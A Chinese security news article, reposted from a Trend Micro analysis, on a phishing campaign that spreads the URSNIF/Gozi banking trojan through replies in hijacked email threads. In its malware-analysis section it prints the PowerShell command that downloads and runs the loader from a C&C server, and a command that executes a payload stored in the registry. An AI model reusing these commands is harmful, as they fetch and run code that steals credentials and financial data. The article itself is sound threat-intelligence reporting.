攻防最前线：利用劫持邮箱回复邮件去传播URSNIF银行木马

来自网络安全公司趋势科技（Trend Micro）的Erika Mendoza、Anjali Patil和Jay Yaneza在本周二通过一篇博文向我们介绍了一种新的网络钓鱼手段，而攻击者的最终目的是向受害者传播知名的银行木马URSNIF（也被称为Gozi，最早出现于2007年，并一直活跃于金融行业）。

根据这篇博文的描述，大多数网络钓鱼活动在本质上都很简单，并且很容易被发现——通常涉及到发送看似合法的电子邮件，并在文本中嵌入恶意附件或链接。但是，趋势科技在9月份观察到的垃圾电子邮件活动表明，攻击者正倾向于另一种更复杂的网络钓鱼形式。

在这起活动中，攻击者并没有利用虚假的电子邮箱账户来新建并发送电子邮件。相反，他们使用了被劫持的账户，并将恶意软件放在了对原始电子邮件的回复中。由于这些电子邮件原本是合法的，而消息只是作为了持续会话的一部分，因此这种特殊的手段往往十分棘手和难以察觉。

从趋势科技目前收集到的所有数据来看，这场活动主要集中在北美和欧洲，仅有少数波及到亚洲和拉丁美洲。另外，这场活动主要针对的是与教育、金融和能源相关的机构，但也涉及到其他一些行业和机构，包括房地产、交通、制造业和政府。

分析钓鱼电子邮件样本

为了便于大家理解，我们在这里将展示由趋势科技提供的一个钓鱼电子邮件样本，如下图所示：

图1.用于回复会话的恶意电子邮件样本

由于电子邮件的发件人是收件人所熟悉的人，并且消息也是会话的一部分，因此收件人很容易相信这只是对原电子邮件的一个回复。此外，主题和语法似乎都是正确的，并且在电子邮件的末尾甚至还有签名。

然而，如果仔细检查就会发现电子邮件中存在一些可疑的地方。其中，最明显的差异是语言从法语到英语的变化。此外，恶意电子邮件中的签名与合法电子邮件中的签名是不同的。最后，回复是通用的，这就导致它可能与主题毫无关联。虽然这并不意味着电子邮件就是恶意的，但至少给了我们一个危险信号。最重要的是，这些细小的细节乍一看可能很难发现，特别是对于那些每天都会查阅大量电子邮件的人来说。

图2.恶意电子邮件与合法电子邮件之间的对比

分析恶意软件有效载荷

如果收件人双击了电子邮件中的恶意.doc附件，那么它将调用PowerShell从命令和控制（C＆C）服务器下载最新版本的URSNIF恶意软件，然后执行下载的文件：

powershell $VWc=new-object Net.WebClient;$wIt=’http: //t95dfesc2mo5jr. com/RTT/opanskot.php?l=targa2.tkn’.Split(‘@’);$jzK = ‘369’;$Aiz=$env:public+’\’+$jzK+’.exe’;foreach($fqd in $wIt){try{$VWc.DownloadFile($fqd, $Aiz);Invoke-Item $Aiz;break;}catch{}}

这个文件将充当恶意软件的主加载程序。在执行其例程之前，它将首先检查操作系统版本。这是由于它只会在Microsoft操作系统上执行，尤其是Windows Vista及其后续版本。另一方面，它还会主动规避某些语言环境，如CN和RU。

主加载程序管理整个执行过程，并将事件记录在文本文件中：

%User Temp%\{temp filename}.bin

图3.恶意软件加载程序的日志

主加载程序还将从C＆C服务器下载其他模块，并将它们保存在注册表文件夹HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4中。

下图展示的是主加载程序创建的注册表项和包含脚本和二进制文件的条目。

图4.注册表项和包含脚本和二进制文件的条目

请注意，虽然这些注册表项和一些注册表项名称会因计算机不同而存在差异，但位置始终位于HKCU\Software\AppDataLow\Software\Microsoft\。

在下载组件之后，主加载程序将执行存储在comsxRes（此名称可能不同）中的Powershell脚本。下面的命令行指令展示了如何调用注册表中的十六进制值。

exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty ‘HKCU:\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-7C9D-AB0E-15700F2219A4’).comsxRes

图5. comsxRes的十六进制值

当此脚本加载存储在注册表中的嵌入式二进制文件时，无文件执行就开始了。在下图中，趋势科技用“–{hex-encoded binary}—”替换了二进制数据，以显示整段代码。脚本是采用base64编码的，以下是解码后的结果：

图6.存储在注册表中的嵌入式二进制文件的代码

它将在创建的注册表项中搜索Client32或Client64，并将此代码注入explorer.exe以建立持久性。注册表中的其他条目在其后续例程中是必不可少的，因为这些条目稍后将在注入的恶意软件代码中引用。例如，“TorClient”条目用于恶意软件通过TOR网络与其C＆C服务器通信。

分析被窃取的信息

最终的有效载荷是一个名为Client32或Client64的DLL文件，具体取决于主机的体系结构。有效载荷的主要目标是执行信息窃取，具体包括以下信息：

• 系统信息
• 已安装的应用程序列表
• 已安装的驱动程序列表
• 正在运行的进程列表
• 网络设备列表
• 外部IP地址
• 电子邮箱凭证（IMAP、POP3、SMTP）
• Cookies
• 证书

此外，它还可以录制屏幕（.AVI），以及通过webinjects窃取财务信息。

声明：本文来自安全内参，版权归作者所有。文章内容仅代表作者独立观点，不代表安全内参立场，转载目的在于传递更多信息。如需转载，请联系原作者获取授权。